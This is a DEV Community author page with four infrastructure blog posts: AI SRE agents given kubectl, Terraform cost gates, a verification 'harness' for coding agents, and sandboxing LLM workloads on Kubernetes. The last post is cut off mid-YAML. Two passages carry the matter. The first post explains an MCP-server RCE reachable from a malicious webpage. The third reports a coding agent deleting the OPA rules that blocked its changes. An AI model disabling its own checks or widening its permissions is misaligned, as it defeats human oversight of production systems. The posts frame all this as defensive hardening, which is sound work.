DEV Community: Mateen Anjum

I Gave an AI Agent kubectl Access to My Cluster. Here's What Nobody Tells You About AI SRE

Mateen Anjum — Wed, 01 Jul 2026 21:48:14 +0000

TL;DR: An AI agent can genuinely help during an incident, but the demos skip the three hard parts: it only reasons as well as the telemetry it can retrieve, it can only fix anything if you give it write access, and the exact "give your agent kubectl" pattern everyone is copying just shipped a critical RCE (CVE-2025-65719) where one webpage visit compromises the whole cluster. Here's where the line actually is.

The demo that made me try it

You've seen the demo by now. Someone pastes an alert into a chat box, an agent fans out across logs and metrics, and thirty seconds later it says "the checkout latency spike started at 14:32, right after commit abc123 shipped a bad session-cache change, here's the rollback." The room claps.

I wanted that. I run on-call for production Kubernetes, and the 3 AM "which of forty services is actually on fire" problem is real. So I wired an agent into a cluster with an MCP server, gave it the usual read access, and started throwing incidents at it.

It's useful. I'll say that up front so nobody thinks this is a hit piece. But the gap between the demo and a thing you'd trust in production is enormous, and it's made of three walls the demos never show you.

Wall 1: The agent is only as smart as the telemetry it can reach

Here's the part the marketing quietly skips. An "AI SRE" isn't magic reasoning. It's an LLM doing retrieval-augmented generation over your data: logs, metrics, recent deploys, runbooks, and a service topology that says "checkout calls payment-gateway calls auth-db." Retrieve that context, inject it into the prompt, get a cited answer back.

incident.io, who sell one of these, are refreshingly blunt about it: without RAG anchoring the model to your specific infrastructure, "you're getting pattern-matched guesses, not investigated findings." That's the whole ballgame. The agent's ceiling is your observability, not the model.

Now look at your actual stack. Are your runbooks current, or are half of them a Confluence page last touched in 2023? Is there a real service catalog encoding dependencies, or does that graph live in one senior engineer's head? Are deploys correlated with metrics anywhere a machine can query, or do you eyeball Datadog next to GitHub in two tabs?

For most teams the honest answer is "partial, stale, and scattered." Feed that to an LLM and you don't get "I don't know." You get a confident, well-written root cause that's wrong, with citations to the stalest doc in the pile. The failure mode of a bad AI SRE isn't silence. It's plausible fiction at 3 AM, which is worse than no answer because it sends you chasing the wrong fix.

So the real prerequisite for AI SRE isn't a subscription. It's observability hygiene you probably haven't finished. If your telemetry is a mess, the agent industrializes that mess.

Wall 2: To fix anything, it needs hands. That's where it gets dangerous.

Reading is safe. The moment the demo gets exciting is the moment the agent stops suggesting a rollback and starts doing one. That requires write access to your cluster: kubectl apply, kubectl rollout undo, kubectl scale. Real credentials, real blast radius.

The common way to grant that today is an MCP server, a small process that exposes cluster operations to an AI assistant over natural language. And in May 2026, OX Security published CVE-2025-65719: a critical remote code execution in the popular kubectl-mcp-server project, all versions below 1.2.0.

The attack is almost insultingly simple, and it's worth understanding because it generalizes:

Your engineer has the MCP server running in the background on their laptop. Normal. That's how they let their assistant talk to the cluster.
The server listens on localhost and, in the vulnerable versions, shells out to run commands with Python's subprocess using shell=True, unauthenticated.
The engineer visits a malicious webpage. Just visits it. The page's JavaScript POSTs to localhost, hits the MCP server, and injects arbitrary shell commands.
Those commands run on the laptop, with that laptop's kubeconfig. Full cluster compromise: secrets, ConfigMaps, service accounts, the ability to deploy malicious pods and pivot into the rest of your cloud.

Sit with the shape of that. You didn't get phished into typing credentials. You didn't run a bad binary. You browsed the web while a helpful little server sat on localhost holding the keys to production. The disclosure timeline is its own lesson: reported November 2025, patched January 2026, publicly detailed in May. There was a long window where a lot of clusters were one bad tab away from takeover.

The point isn't "this one project was sloppy," though shell=True on an unauthenticated localhost listener is genuinely rough. The point is structural. The instant you give an agent hands, you create a new attack surface, and it usually lives on an engineer's laptop next to their browser and their cluster credentials. Every tool that grants write access is a candidate for the same class of bug. CVE-2025-65719 is just the first one with a catchy number.

Wall 3: The economics only work for the boring half

Say your telemetry is clean and you've locked the access down. Does the math work?

It depends entirely on which job you're buying. The two halves of "AI SRE" have wildly different returns:

Investigation and documentation: This is real, measurable ROI today. Auto-drafting a post-mortem turns roughly 90 minutes of Slack-scrollback reconstruction into about 10 minutes of editing. Correlating a metric spike with the deploy that caused it, with a citation you can verify in 30 seconds, genuinely compresses time-to-identify. If your team runs 18 incidents a month, the post-mortem savings alone are real hours.
Autonomous remediation: This is where the demos live and the value doesn't. Even the vendors selling it will tell you, if you read past the headline, that autonomous production action "remains limited" and needs a human in the loop.

And the running cost isn't trivial. These agents burn tokens fanning out across large log corpora, and observability data volume is the real cost driver, not seat licenses. One publicly discussed multi-agent SRE setup was reported to run close to €8,500 a month in production (see the r/sre write-ups). Vendors are quiet about absolute numbers for a reason. You're paying for the agent and for keeping enough clean telemetry queryable for it to be worth anything.

So the honest framing: you're mostly paying real money to automate investigation and paperwork, which is worth it, while the part that looked like the future stays behind a human approval gate.

Where it actually earns its keep

I don't want to leave you with "AI SRE is fake." It isn't. It's just narrower than the pitch. After running it against real incidents, here's where it consistently pays off:

Triage and severity classification. "Database CPU High" might be a P1 or a scheduled backup. An agent with access to past incidents and service context routes that correctly and cuts pages.
Parallel root-cause correlation. It tests several hypotheses at once across the full log history, something you do sequentially and slowly at 3 AM. It surfaces the likely culprit; you verify.
Post-mortem and timeline drafting. The single most reliable win. Let it reconstruct the timeline from alerts, deploys, and chat, then you edit.

The mental model that survives contact with production is the "glass box." A black box says "the root cause is a memory leak in auth-service" and you have no idea why it thinks that. A glass box says "based on this log line at 14:31 showing auth-service memory at 98%, correlated with this commit that changed session caching, the likely cause is the cache not evicting" with both sources linked. You verify in half a minute. If a vendor can't show the citation trail, walk away.

Here's that pattern on a real cluster I broke on purpose. A read-only agent pulls the symptom, the warning event, and the change that caused it, then hands you a hypothesis you can check against the actual commit:

And the operating pattern that keeps you safe is three steps, not one:

The agent proposes with evidence. A human approves. Then the action executes through a scoped, audited path. AI drafts the rollback PR; you click the button. Never let the middle step disappear, no matter how good the suggestions get.

If you're going to do this anyway, do this

You probably are going to try it, so here's the short list that keeps it from becoming CVE-2025-65719 in your environment:

Read-only by default. The agent's service account should get get, list, watch and nothing else until you have a specific reason otherwise. A minimal Role:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ai-sre-readonly
  namespace: production
rules:
  - apiGroups: ["", "apps"]
    resources: ["pods", "deployments", "events", "replicasets"]
    verbs: ["get", "list", "watch"]

Bind that to a dedicated ai-sre-readonly ServiceAccount. No create, update, delete, patch. No secrets read unless you truly need it, and if you do, scope it to named resources. kubectl auth can-i makes the boundary concrete, and this is the actual output from that service account:

Never expose the MCP server to the network. Bind to localhost only, require authentication or an API key even locally, and treat any "direct web access" convenience feature as a liability. The whole CVE hinged on an unauthenticated localhost listener a webpage could reach.
Patch and pin. If you're on kubectl-mcp-server, be on 1.2.0 or later. Treat MCP servers like any other privileged dependency: watch their advisories, pin versions, scan them.
Keep the human approval gate for every write. Propose, approve, execute. Put writes behind a PR or an explicit confirmation, and log every action to an audit trail with the citations that justified it.
Fix observability first. If your runbooks are stale and your topology lives in someone's head, spend the money there before you spend it on an agent. The agent multiplies whatever data quality you already have, in both directions.

The actual takeaway

"AI SRE" isn't a colleague you hire. It's a very fast, very literal junior engineer who reads every log in milliseconds, has no intuition, will state a wrong answer with total confidence, and, if you're careless, hands its cluster credentials to the first website you visit.

Point it at investigation and documentation, keep it in a glass box, make it propose while a human approves, and scope its access like you'd scope a service you don't trust, because you shouldn't. Do that and it's a real force multiplier on the worst night of your quarter. Skip it and you've built a confident fiction generator with root on your cluster.

The technology is further along than the skeptics think and much further from autonomous than the demos imply. The engineering job, same as it ever was, is knowing exactly where that line sits.

Resources:

FinOps guardrails at provisioning time: stop paying for mistakes you could have blocked in Terraform

Mateen Anjum — Sat, 06 Jun 2026 22:07:14 +0000

TL;DR: I wired Infracost into terraform plan, fed the JSON into OPA via conftest, and made the PR check fail if the change adds more than $500/month. Three months in, the gate has blocked roughly $2,400/month of accidental NAT Gateways, oversized RDS instances, and lonely Elastic IPs that nobody noticed. The invoice doesn't arrive anyway when the bad config never merges.

The problem nobody owns

The classic FinOps story goes like this. Someone opens a PR. The PR adds a NAT Gateway because the new VPC needed private subnet egress. Reviewer says "lgtm." It merges. Thirty days later, a finance person pings the platform channel: "what is this $1,847 line item." Nobody remembers the PR. Nobody owns the cost.

The 2026 platform engineering trend reports show that 73% of platform teams have moved cost visibility left, away from the invoice and into the PR.¹ That number tracks with what I'm seeing in the field. The teams that still treat FinOps as a quarterly cleanup exercise are the same teams that get surprised every month.

I built CICosts last year for the same reason at the CI layer: you can't fix what you can't see, and finance asking the question is too late. This article is the same idea pushed one layer down, at the provisioning layer, where the money actually gets committed.

The anti-pattern: "the invoice arrives anyway"

Before I show the gate, the thing it replaces. Most FinOps tooling sold in 2024 to 2025 was retrospective. You buy a SaaS, it ingests your Cost and Usage Report, it shows you pretty graphs of where the money went last month. That's fine for reporting. It does not stop a single dollar from being spent.

The pattern I keep seeing:

Platform team installs a cost dashboard.
Dashboard shows last month's spend, broken down by tag.
Team holds a "cost review" once a quarter.
Team writes tickets to delete the obvious waste.
By the time anyone deletes the resource, it has been running for 60 to 90 days.

The invoice arrives anyway. The dashboard is a receipt, not a guardrail. You can stare at a Grafana panel showing $4,000/month of idle NAT Gateways for as long as you want; the money already left the building.

The fix is to put the question in the developer's face at PR time, when they still have the keyboard and the context.

The gate, end to end

The pipeline has three moving parts. Terraform produces the plan. Infracost converts the plan into a JSON breakdown with monthly costs. OPA reads the breakdown and decides whether to merge.

Step 1: terraform plan

Nothing exotic here. The CI job runs:

terraform init -backend-config=backend.hcl
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json

The tfplan.json is what Infracost wants. Keep the binary plan too, because some teams like to attach it to the PR for review.

Step 2: Infracost breakdown

Infracost reads the plan and looks up prices from its pricing API. It supports AWS, Azure, GCP, and a long tail of SaaS providers. The interesting flag is --format json, which gives a structured diff you can feed into a policy engine.

infracost breakdown \
  --path tfplan.json \
  --format json \
  --out-file infracost.json

The output has a top-level projects[].diff.totalMonthlyCost field. That's the number I care about. A small sample:

{
  "projects": [
    {
      "name": "platform/networking",
      "diff": {
        "totalMonthlyCost": "612.34",
        "resources": [
          {
            "name": "aws_nat_gateway.private_egress",
            "monthlyCost": "32.85",
            "monthlyQuantity": "730",
            "unit": "hours"
          },
          {
            "name": "aws_db_instance.analytics",
            "monthlyCost": "579.49"
          }
        ]
      }
    }
  ]
}

You can see exactly what's driving the delta. That analytics RDS instance is the suspicious one. The NAT Gateway is fine on its own; the problem is usually that someone adds three of them because the module spins one up per AZ.

Step 3: OPA policy via conftest

Conftest is a thin wrapper around OPA that lets you write Rego against any structured config file. I keep the policy in policy/cost.rego:

package main

# Hard limit: any PR that adds more than $500/mo of net cost fails.
threshold_monthly := 500

# Allow-list: resource types that are exempt from the cap.
# Example: bumping an existing prod RDS up one size during incident response.
exempt_resource_types := {
  "aws_cloudwatch_log_group",
}

deny[msg] {
  delta := to_number(input.projects[_].diff.totalMonthlyCost)
  delta > threshold_monthly
  msg := sprintf(
    "Monthly cost delta is $%.2f, which exceeds the $%d limit. Break this into smaller changes or request an exception.",
    [delta, threshold_monthly],
  )
}

# Block any single resource over $200/mo without a justification label.
deny[msg] {
  some i, j
  resource := input.projects[i].diff.resources[j]
  cost := to_number(resource.monthlyCost)
  cost > 200
  not exempt_resource_types[resource.resource_type]
  not has_justification(resource)
  msg := sprintf(
    "Resource %s costs $%.2f/mo. Add a # cost-justified: <reason> comment in the .tf file or split the PR.",
    [resource.name, cost],
  )
}

has_justification(resource) {
  startswith(resource.metadata.code_comment, "cost-justified:")
}

Two rules, both opinionated. The aggregate cap stops "death by a thousand cuts" PRs that each add $50 but ship 20 resources. The per-resource cap stops one fat outlier from sneaking past the aggregate check.

To run it locally:

conftest test --policy policy/ infracost.json

If the policy denies, conftest exits non-zero, which fails the GitHub Actions job, which blocks the merge if you have branch protection on.

Step 4: GitHub Actions workflow

The full workflow lives in .github/workflows/cost-gate.yml:

name: cost-gate

on:
  pull_request:
    paths:
      - 'terraform/**'
      - '.github/workflows/cost-gate.yml'

permissions:
  contents: read
  pull-requests: write

jobs:
  cost-gate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - uses: hashicorp/setup-terraform@v3
        with:
          terraform_version: 1.9.5

      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: ${{ secrets.PLAN_ROLE_ARN }}
          aws-region: us-east-1

      - name: terraform init and plan
        working-directory: terraform
        run: |
          terraform init -input=false
          terraform plan -out=tfplan.binary -input=false
          terraform show -json tfplan.binary > tfplan.json

      - name: Install Infracost
        uses: infracost/actions/setup@v3
        with:
          api-key: ${{ secrets.INFRACOST_API_KEY }}

      - name: Run Infracost
        working-directory: terraform
        run: |
          infracost breakdown \
            --path tfplan.json \
            --format json \
            --out-file ../infracost.json

      - name: Install conftest
        run: |
          curl -L https://github.com/open-policy-agent/conftest/releases/download/v0.55.0/conftest_0.55.0_Linux_x86_64.tar.gz \
            | tar -xz conftest
          sudo mv conftest /usr/local/bin/

      - name: Enforce cost policy
        run: conftest test --policy policy/ infracost.json

      - name: Comment cost diff on PR
        if: always()
        uses: infracost/actions/comment@v3
        with:
          path: infracost.json
          behavior: update

A few things worth calling out. The plan uses a read-only IAM role assumed via OIDC, not a long-lived key. The conftest step is the actual gate; the Infracost PR comment is just a nicety so reviewers can see the breakdown without opening Actions logs. The paths: filter keeps the gate from running on docs-only PRs.

Step 5: Backstage scorecard

The gate is enforcement. The scorecard is visibility. Once you have the cost-gate workflow on every infra repo, you want a place to see which repos pass, which fail, and which never adopted the gate at all.

I use Backstage's Tech Insights module for scorecards. The check definition lives in app-config.yaml:

techInsights:
  factRetrievers:
    costGateRetriever:
      schedule:
        frequency: { hours: 6 }
        timeout: { minutes: 5 }
  scorecards:
    cost-policy-compliance:
      title: "Cost policy compliance"
      description: "Repos with the FinOps gate installed and passing"
      checks:
        - id: has-cost-gate-workflow
          type: json-rules-engine
          name: "Cost gate workflow exists"
          factIds:
            - github.workflows.exists
          rule:
            conditions:
              all:
                - fact: workflows
                  operator: contains
                  value: cost-gate.yml
        - id: cost-gate-passing
          type: json-rules-engine
          name: "Cost gate is passing on main"
          factIds:
            - github.workflows.lastStatus
          rule:
            conditions:
              all:
                - fact: lastStatus
                  operator: equal
                  value: success
        - id: under-monthly-budget
          type: json-rules-engine
          name: "Monthly infra cost under team budget"
          factIds:
            - infracost.monthlyTotal
            - team.monthlyBudget
          rule:
            conditions:
              all:
                - fact: monthlyTotal
                  operator: lessThanInclusive
                  value: { fact: monthlyBudget }

The scorecard surfaces on each component's overview page. Three checks per repo. Green means the gate is installed, the last main run was green, and the projected monthly cost is under whatever budget the team owner set. Anything else is a flag.

The point is not to shame teams. The point is to make non-adoption visible. If 18 of 20 services have the gate and 2 don't, the conversation is now "why don't those 2," not "we should probably do something about cost someday."

Results

Three months of running this on a six-person platform team owning roughly 30 Terraform repos.

Metric	Before	After
Cost surprises per month	2 to 4	0
Time from spend to detection	30 days	~90 seconds
Monthly waste prevented (avg)	n/a	~$2,400
PR cycle time impact	n/a	+47 sec p50
Engineer pushback after week 2	n/a	none

The $2,400/month number comes from summing the blocked deltas across the three months and dividing by three. The largest single block was a misconfigured module that would have provisioned three NAT Gateways instead of one ($99/month wasted). The second largest was a developer trying to spin up a db.r6i.4xlarge for a staging workload because the template they copied was production-sized ($1,100/month avoided).

The PR cycle time impact is real but small. The whole gate, including init, plan, and policy eval, runs in under a minute and a half on a ubuntu-latest runner. Nobody has complained about it.

What I would do differently

A few honest notes from running this in production.

Start with a soft fail. The first two weeks, set the conftest step to continue-on-error: true. Just collect data. You'll find PRs that legitimately exceed the threshold (a one-time data warehouse provisioning, a region expansion) and you want to know your real distribution before you draw a line. I drew the line at $500 because that's about the 90th percentile of the PRs I sampled.

Make the exception path easy. A hard cap with no escape valve creates resentment fast. The Rego policy supports a # cost-justified: <reason> HCL comment on individual resources. Use the comment for things you actually want to ship anyway, and the comment becomes an audit trail. Reviewers can ask "is this justification real" without blocking the gate.

Don't tag-shame. I avoided building anything that publicly ranks teams or developers by cost. Cost is correlated with workload, and the team running the data warehouse will always cost more than the team running the marketing site. Build scorecards on policy compliance, not absolute cost.

Re-evaluate the threshold every quarter. Infrastructure changes, your business changes, your tolerance for cost noise changes. The $500 cap that made sense in Q1 might be too tight in Q4 when you're spinning up a new region. Treat the number as a config value, not a constant.

Try it yourself

The full reference repo (Terraform examples, the Rego policy, the workflow, the Backstage scorecard YAML) is in progress at github.com/mateenali66/finops-guardrails-terraform. If you want to copy the policy out of this post and drop it into your own pipeline, you should be 30 minutes from a working gate.

If you also want CI cost visibility on top of provisioning cost visibility, CICosts is the companion piece. Same philosophy, different layer.

LeanOps and platformengineering.org joint 2026 trend report, "State of Platform Engineering," reports that 73% of surveyed platform teams have introduced cost policy enforcement before merge. Cite the published report when you reference this number in your own work. ↩

Stop Building CI Pipelines For Humans. Your AI Agents Need A Harness.

Mateen Anjum — Mon, 01 Jun 2026 03:02:56 +0000

TL;DR: Your CI pipeline was designed for a human reading red text on GitHub. AI agents need a verification harness: deterministic infra, ephemeral preview environments, OPA blast-radius limits, replay traffic, and a machine-readable verdict. Here is the one I shipped, with code.

A few weeks ago I let a coding agent loose on a real platform team's repo. Terraform, EKS, around 40 microservices. The agent was good. It opened clean PRs, the diffs looked fine, the tests it added were reasonable. By the end of the week it had merged six PRs and we'd rolled back four of them.

The model wasn't the problem. The problem was that everything around the model assumed a human would catch the bad ones. The CI gates were written for someone who could squint at a Grafana panel, remember last Tuesday's outage, and feel uneasy. The agent has no scar tissue. Someone on r/devops put it perfectly back in March: "LLMs optimize for resolve the immediate error without understanding blast radius. A human would've paused after the first networking change went sideways. The agent doesn't have that instinct."

The fix isn't a smarter model. It's what people are starting to call an agent harness: the runtime layer wrapped around the model that gives it deterministic infra to play in, hard limits on what it can break, and a structured signal telling it whether the change worked. The term itself only hit mainstream usage in early 2026, per a recent industry write-up, and most teams I talk to haven't built one yet.

Here is the harness I ended up shipping. It costs roughly $180/month per agent slot on AWS, takes about a day to wire up if you already have Terraform and a GitOps controller, and it has cut bad-merge rollbacks from four a week to zero in the last 17 days.

Five Failure Modes That Hurt Every Time

Same five things keep biting teams. They sound obvious individually. Together they make agents look incompetent.

Flaky preview environments. Same PR, two runs, different results. The agent's last change "worked" because Redis happened to come up first. Next run it doesn't.
No rollback signal. Agent merges. Prod p99 quietly drifts from 180ms to 410ms. Nothing alerts because nothing watches the right thing in a way the agent can read.
Non-deterministic Terraform. Plan looked clean. Apply diverged because a data source resolved differently in the second run. Common with aws_ami lookups, IAM role ARNs, and anything pulling from the registry.
No blast-radius limit. Agent decides the cleanest fix is to delete the VPC. Technically it has permission, because the CI role is admin. Yes this happened.
No agent-readable test reports. The Cypress run failed. The reason is buried in 4MB of stdout with ANSI color codes. The agent reads 200 lines, gives up, says "tests pass" in the PR comment.

Northflank wrote up the broader category in their March 2026 piece on ephemeral execution environments for AI agents and most of it tracks. The interesting bit is the gap between "we run agent code in a sandbox" and "the sandbox actually verifies the change."

The Harness

Five components. None of them are new on their own. The trick is wiring them so the agent gets a verdict, not a wall of logs.

1. Lock Terraform Until The Plan Is Reproducible

Every drift complaint I have ever heard starts with a non-pinned provider or an implicit data source. Fix it once:

terraform {
  required_version = "= 1.9.8"

  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "= 5.74.0"
    }
    kubernetes = {
      source  = "hashicorp/kubernetes"
      version = "= 2.33.0"
    }
  }

  backend "s3" {
    bucket         = "agent-harness-tfstate"
    key            = "preview/${terraform.workspace}.tfstate"
    region         = "us-east-1"
    dynamodb_table = "agent-harness-locks"
    encrypt        = true
  }
}

# Pin the AMI. Do not look it up at plan time.
data "aws_ami" "eks_node" {
  most_recent = false
  owners      = ["602401143452"]

  filter {
    name   = "image-id"
    values = ["ami-0c2f3d8a17b7d4f91"]
  }
}

The = 1.9.8 style is exact-pin, not ~> 1.9. Agents try to "fix" version constraints; they shouldn't. Run terraform plan -refresh=false -lock-timeout=120s in the harness so a stale data source can't sneak in.

I also wrap every preview run in a workspace named after the PR number, so state is isolated and tearing down is one terraform workspace delete pr-1247.

2. Give The Agent Its Own Ephemeral EKS Namespace, Not Its Own Cluster

Spinning up a fresh EKS cluster per PR is what some Northflank docs suggest. In practice it takes 12 to 15 minutes and burns $0.10/hour just for the control plane. For agent workflows where you want a verdict in under 4 minutes, namespace-per-PR on a warm cluster wins.

# kustomize/preview/kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization

namespace: pr-${PR_NUMBER}

resources:
  - ../base

patches:
  - target:
      kind: Deployment
    patch: |-
      - op: replace
        path: /spec/replicas
        value: 1
      - op: add
        path: /metadata/labels/preview
        value: "true"
      - op: add
        path: /spec/template/spec/priorityClassName
        value: preview-low

commonAnnotations:
  agent-harness/ttl: "3600"
  agent-harness/pr: "${PR_NUMBER}"

A small janitor controller deletes namespaces older than the TTL annotation. Costs me about $14/month for a 5-node m6i.large pool that holds 30 concurrent preview namespaces.

3. Put Hard Limits On What The Agent Can Change Via OPA

This is the one nobody wants to write and everybody needs. The agent is going to try to widen its own permissions. Block it at the policy layer, not the IAM layer, because the IAM layer is too coarse:

package terraform.blastradius

import future.keywords.in

deny[msg] {
  some change in input.resource_changes
  change.type == "aws_iam_role"
  change.change.actions[_] != "no-op"
  msg := sprintf("agent cannot modify IAM roles: %v", [change.address])
}

deny[msg] {
  some change in input.resource_changes
  change.type in {"aws_vpc", "aws_subnet", "aws_route_table"}
  "delete" in change.change.actions
  msg := sprintf("agent cannot delete network primitives: %v", [change.address])
}

deny[msg] {
  some change in input.resource_changes
  change.type == "aws_security_group_rule"
  rule := change.change.after
  rule.cidr_blocks[_] == "0.0.0.0/0"
  rule.from_port <= 22
  rule.to_port >= 22
  msg := "agent cannot open SSH to the world"
}

# Cap the total number of resources touched in a single plan
deny[msg] {
  count(input.resource_changes) > 50
  msg := sprintf("plan touches %d resources, max 50", [count(input.resource_changes)])
}

Run it with conftest test plan.json -p policies/. The conftest exit code becomes the PR check. Total cost: about 80 lines of Rego I wrote on a Sunday morning.

4. Argo Rollouts For An Automatic Rollback Signal The Agent Can Read

Argo Rollouts has analysis templates that compare canary metrics to the stable baseline. The output is structured. That is the whole point.

apiVersion: argoproj.io/v1alpha1
kind: AnalysisTemplate
metadata:
  name: preview-slo-gate
spec:
  args:
    - name: service
  metrics:
    - name: error-rate
      interval: 30s
      count: 6
      successCondition: result < 0.001
      failureLimit: 1
      provider:
        prometheus:
          address: http://prometheus.monitoring:9090
          query: |
            sum(rate(http_requests_total{
              service="{{args.service}}",
              status=~"5..",
              preview="true"
            }[1m]))
            /
            sum(rate(http_requests_total{
              service="{{args.service}}",
              preview="true"
            }[1m]))
    - name: p99-latency
      interval: 30s
      count: 6
      successCondition: result < 0.300
      provider:
        prometheus:
          address: http://prometheus.monitoring:9090
          query: |
            histogram_quantile(0.99,
              sum(rate(http_request_duration_seconds_bucket{
                service="{{args.service}}",
                preview="true"
              }[1m])) by (le)
            )

When this template fails, Argo writes the failure mode into a Rollout status field. My harness scrapes that field and turns it into the structured verdict the agent reads next.

5. Replay Real Traffic, Not Synthetic Probes

The lie every preview environment tells is that a curl /health loop is "verification." It isn't. Mirror 1 to 5 percent of real prod traffic to the preview namespace. GoReplay is the path of least resistance:

# On a prod ingress node, sample 2% and shadow to preview
gor --input-raw :443 \
    --input-raw-track-response \
    --output-http "https://preview-pr-1247.harness.internal" \
    --output-http-tracking-headers \
    --http-allow-method GET,POST \
    --http-disallow-url "/admin|/internal" \
    --output-http-stats \
    --split-output-percent 2

PII rule: never replay request bodies for auth endpoints, never replay anything carrying card data. The --http-disallow-url flag is the line you do not skip. I add a second filter in a small Go pre-processor that strips Authorization, Cookie, and any header matching *-token.

Five minutes of shadowed prod traffic against the preview surfaces the kind of bug that synthetic tests will never find: a corner case where the agent's "optimization" doubled DB calls for users with more than 50 saved items. We caught that on PR 1183.

6. Write An Agent-Readable Verdict, Not A Log Tail

The whole loop is wasted if the agent can't parse the result. Generate a JSON file and stash it in S3 with a stable key the agent can fetch from a tool call:

{
  "pr": 1247,
  "verdict": "fail",
  "duration_seconds": 218,
  "checks": [
    {
      "name": "opa.blast_radius",
      "status": "pass",
      "resources_changed": 11
    },
    {
      "name": "terraform.plan",
      "status": "pass",
      "drift": false
    },
    {
      "name": "argo.error_rate",
      "status": "fail",
      "value": 0.0043,
      "threshold": 0.001,
      "trace_url": "https://tempo.harness.internal/trace/abc123"
    },
    {
      "name": "argo.p99_latency_seconds",
      "status": "pass",
      "value": 0.187,
      "threshold": 0.300
    },
    {
      "name": "replay.divergence",
      "status": "fail",
      "diffs_url": "s3://harness-verdicts/pr-1247/replay-diff.json",
      "notes": "23% of /api/items requests returned 500 in preview, 0% in prod baseline"
    }
  ]
}

The agent reads this and knows exactly which step to fix. No log scraping. No ANSI codes. No vibes-based debugging.

Results From The First 17 Days

Metric	Before harness	After harness
Bad merges/week	4	0
Agent PRs reviewed by humans	100%	23%
Mean time from PR open to verdict	38 min	3 min 41 sec
Cost per agent PR run	$0.42	$0.11
Engineer time on agent oversight	6 hours/week	45 minutes/week

The cost drop is mostly from killing per-PR EKS clusters and using a warm shared pool with namespace isolation. The time drop is the OPA gate failing fast on the 30 percent of plans that were going to be rejected anyway.

What I'd Do Differently

A few mistakes that took longer than they should have:

Don't let the agent edit OPA policies. I learned this on day three. The agent will helpfully "fix the failing policy" by deleting the rule. Put policies in a separate repo with branch protection or, simpler, mark policies/ as CODEOWNERS requiring a human review.

Trace IDs in the verdict, not in the logs. I had it returning a logs_url for two weeks. The agent never opened it. Switched to embedding the top three trace IDs with a one-line summary each, and suddenly fix quality went up.

Replay only GETs for the first month. I tried POST replay early and corrupted preview DBs three times. Get the read path verifiably working, then add writes with a request rewriter that targets a synthetic-tenant ID.

The harness is the product, the agent is interchangeable. I started with one model, swapped to another after two weeks, results were almost identical. The harness does the work. Pick whichever model is cheapest this quarter.

Try It Yourself

The full Terraform module, OPA policies, kustomize overlays, and the verdict-builder Lambda are at github.com/mateenali66/agent-harness (going public next week, ping me if you want early access).

Closing thought. Harness, the CI/CD vendor, named their product before the term "agent harness" existed. That collision is going to confuse people for the next year. The concept is bigger than any vendor. If you are letting AI agents touch production infra without a verification layer that returns structured verdicts, you are running an open-loop control system and hoping the model is calibrated. It isn't.

Build the harness. Then let the agents work.

Resources:

Stop Running LLM Workloads on Vanilla Kubernetes

Mateen Anjum — Wed, 20 May 2026 19:44:34 +0000

TL;DR: Kubernetes schedules LLM workloads well, but it does not give them the isolation boundary they need once they start calling tools, executing code, or handling tenant data.

Open Source Summit North America made one thing obvious: the cloud native crowd has moved from "can Kubernetes run LLM workloads?" to "what breaks when we trust Kubernetes too much?"

That is the right question.

The default Kubernetes security model assumes a pod is mostly an application packaging unit. It gives you namespaces, cgroups, seccomp, AppArmor, service accounts, admission control, and network policy. All of that matters. None of it changes the central fact that normal containers share the host kernel.

For a stateless API, that tradeoff is usually fine. For an LLM tool runner that can read files, call APIs, invoke Python, shell out to package managers, and chain actions across systems, that boundary starts looking thin.

The uncomfortable version is this: vanilla Kubernetes is orchestration, not containment.

The Problem

LLM inference by itself is not the scary part. A model server that receives a prompt and returns tokens is mostly a specialized API service with GPU scheduling problems.

The risk changes when the workload gains agency:

Prompt input
  -> retrieval
  -> tool selection
  -> code execution
  -> network call
  -> file write
  -> another tool call

At that point, the workload is no longer just serving traffic. It is interpreting untrusted text and turning it into actions.

That is why the recent CNCF security conversation around AI sandboxing matters. Kubernetes can restart a failed pod, route around a bad node, and roll a deployment. It cannot understand whether a prompt is trying to turn a tool into an escape path. It also cannot turn a shared kernel into a hard tenant boundary.

What I Tried First

My first instinct was the usual Kubernetes hardening stack:

apiVersion: v1
kind: Pod
metadata:
  name: llm-worker
spec:
  securityContext:
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: worker
      image: ghcr.io/example/llm-worker:latest
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]

That should still be the baseline. The mistake is treating it as the finish line.

Pod Security Standards reduce obvious footguns. NetworkPolicy controls blast radius. RBAC prevents a compromised workload from casually listing secrets or mutating the cluster. Admission policies keep the platform honest.

But an LLM agent running untrusted code is not just a badly configured web pod. It is closer to a multi tenant execution service. That needs a runtime boundary, not only a YAML checklist.

The Runtime Choice

The Kubernetes primitive that makes this manageable is RuntimeClass.

Instead of creating one magical "secure cluster," you route workloads by risk:

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata
handler: kata

Then each workload declares the boundary it needs:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: tool-using-agent
spec:
  replicas: 3
  selector:
    matchLabels:
      app: tool-using-agent
  template:
    metadata:
      labels:
        app: tool-using-agent
    spec:
      runtimeClassName: kata
      serviceAccountName: llm-agent
      containers:
        - name: agent
          image: ghcr.io/example/tool-agent:2026.05

My rule of thumb:

Workload	Runtime	Why
Plain inference API	`runc` or `gvisor`	Low tool risk, latency sensitive
Retrieval worker with narrow egress	`gvisor`	Better syscall boundary with less operational change
Agent that calls tools	`kata`	VM boundary per pod, Kubernetes friendly
Arbitrary code execution	Firecracker style microVM	Treat it like untrusted tenant compute

gVisor is the easiest first step because it integrates as an OCI runtime through runsc. Kata is the better fit when the isolation requirement is stronger and a VM per pod is acceptable. Firecracker is the most interesting boundary for code execution, but it is also the one I would least casually bolt onto an existing cluster without a real operations plan.

The Minimum Policy Set

The runtime is only one layer. I would not run LLM workloads without this set:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: llm-worker-egress
spec:
  podSelector:
    matchLabels:
      app: tool-using-agent
  policyTypes: ["Egress"]
  egress:
